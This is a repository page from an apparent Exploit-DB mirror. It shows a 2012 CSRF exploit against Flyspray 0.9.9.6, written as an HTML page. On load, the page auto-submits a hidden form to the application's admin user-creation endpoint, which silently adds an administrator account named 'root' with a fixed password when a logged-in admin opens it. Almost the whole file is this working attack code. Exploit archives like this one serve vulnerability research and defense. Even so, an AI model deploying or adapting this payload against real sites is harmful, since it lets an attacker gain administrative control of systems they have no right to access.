bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/18468.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
1.1 KiB
HTML
Raw Blame History

#Exploit Title: Flyspray 0.9.9.6 CSRF Vulnerability
#Date: 06 Feb 2012
#Author: Vaibhav Gupta
#Software Link: http://flyspray.org/flyspray-0.9.9.6.zip
#Version: 0.9.9.6
+---+[CSRF Add Admin Account after authentication]+---+
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add ADMIN account</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/flyspray-0.9.9.6/index.php?do=admin&area=newuser">
<input type="hidden" name="action" value="admin.newuser"/>
<input type="hidden" name="do" value="admin"/>
<input type="hidden" name="area" value="newuser"/>
<input type="hidden" name="user_name" value="root"/>
<input type="hidden" name="user_pass" value="12345678"/>
<input type="hidden" name="user_pass2" value="12345678"/>
<input type="hidden" name="real_name" value="root"/>
<input type="hidden" name="email_address" value="root@root.com"/>
<input type="hidden" name="jabber_id" value=""/>
<input type="hidden" name="notify_type" value="0"/>
<input type="hidden" name="time_zone" value="0"/>
<input type="hidden" name="group_in" value="1"/>
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink